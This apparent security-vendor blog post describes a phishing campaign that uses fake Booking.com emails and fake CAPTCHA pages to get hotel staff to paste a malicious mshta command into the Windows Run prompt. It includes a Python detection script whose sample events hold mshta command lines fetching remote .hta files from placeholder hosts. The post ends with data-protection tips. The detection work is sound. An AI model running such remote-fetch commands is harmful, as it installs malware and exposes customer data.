
Booking.com phish uses fake CAPTCHAs to trick hotel staff into downloading malware

A new phishing campaign that uses the fake CAPTCHA websites we reported about recently is targeting hotel staff in a likely attempt to access customer data, according to research from ThreatDown.

Here’s how it works: Cybercriminals send a fake Booking.com email to a hotel’s email address, asking them to confirm a booking.

The email is sent only a few days before the check-in date, which is very likely intended to create a sense of urgency—a common tactic of scammers.

If the hotel staff copy and paste the URL from the email into the browser address bar, they are greeted by a fake CAPTCHA website.

When they check the box, they’ll then see “verification” instructions that will effectively infect their system.

As we explained in more detail here, these instructions will infect their Windows system with an information stealer or Trojan.

What the hotel staff would actually be doing is copying and pasting an mshta command into the Run prompt and executing it. That command fetches a remote file and runs it on their system.
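The chain described above leaves a distinctive trace in process telemetry: mshta.exe started by explorer.exe (which is what a command typed into the Run prompt looks like) with a remote URL on its command line. The following detection logic is an added example written for this article, not code from Malwarebytes or ThreatDown. The events are constructed to resemble Sysmon Event ID 1 (process creation) fields; the URL, IP address and paths are placeholders and not indicators from the campaign.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample records modelled on Sysmon Event ID 1 fields
# (Image, CommandLine, ParentImage). Not real telemetry; URL and paths are placeholders.
SAMPLE_EVENTS = [
    {   # The pattern from the article: mshta pasted into Run, pulling a remote file.
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta https://verification.example.invalid/check.hta",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # mshta with a remote URL, but spawned by a script host rather than Run.
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" http://203.0.113.10/a.hta',
        "ParentImage": r"C:\Windows\System32\wscript.exe",
    },
    {   # Local .hta opened by double-click: common with legacy in-house tools.
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Apps\legacy\menu.hta"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # Ordinary user activity: nothing to report.
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

# Remote locations mshta can be pointed at: http(s)/ftp URLs or UNC paths.
REMOTE_RE = re.compile(r"(?i)\b(?:https?|ftp)://[^\s\"']+|\\\\[\w.-]+\\[^\s\"']+")


@dataclass
class Finding:
    severity: str   # "high" or "medium"
    remote: str     # the remote resource found on the command line
    reason: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[Finding]:
    """Flag mshta.exe launches that fetch a remote resource.

    An explorer.exe parent is what a command entered in the Run prompt looks
    like, i.e. exactly the user action the fake CAPTCHA asks for.
    """
    if basename(event["Image"]) != "mshta.exe":
        return None
    match = REMOTE_RE.search(event["CommandLine"])
    if not match:
        return None  # local .hta only; not the remote-fetch pattern described
    if basename(event["ParentImage"]) == "explorer.exe":
        return Finding("high", match.group(0),
                       "mshta launched from Explorer (Run prompt) with a remote resource")
    return Finding("medium", match.group(0),
                   "mshta fetching a remote resource from a non-interactive parent")


def detect(events):
    """Run classify over a list of events and return (index, Finding) pairs."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e)) is not None]


if __name__ == "__main__":
    for idx, finding in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {finding.severity.upper()} - {finding.reason} -> {finding.remote}")
```

In a real environment the same rule would run over Sysmon or EDR process-creation events rather than the embedded list. Detection complements prevention: where front-desk staff have no legitimate need for mshta.exe, blocking it with AppLocker or WDAC removes this particular step from the attacker's playbook entirely.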

We don’t know the exact plans of the criminals once they have gained control over the system, but it’s highly likely they’re after customer payment details and other personal data: data that is very valuable to them and can be traded on the dark web.

There isn’t much you can do to protect your own data in situations like these, when cybercriminals are attacking the companies that hold your personal information. However, there are a few things you can do to lower your risk.

How to protect your data online

  • Don’t store your card details. Not in your browser, not on websites. Sure, it’s more convenient to get sites to remember your card details for you, but we highly recommend not storing that information.

  • Find out what information is already out there. Our free Digital Footprint scan searches the dark web, social media, and other online sources, to tell you where your data has been exposed.

  • Remove as much of that information as you can. You can do this manually by cleaning things up yourself, or if you’re in the US then you can use Malwarebytes Personal Data Remover to do it for you.

  • Monitor your accounts. Check your accounts periodically for unexpected changes and notifications of suspicious login attempts.

  • Use a different password for every online account. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.

  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.

  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

 Pieter Arntz
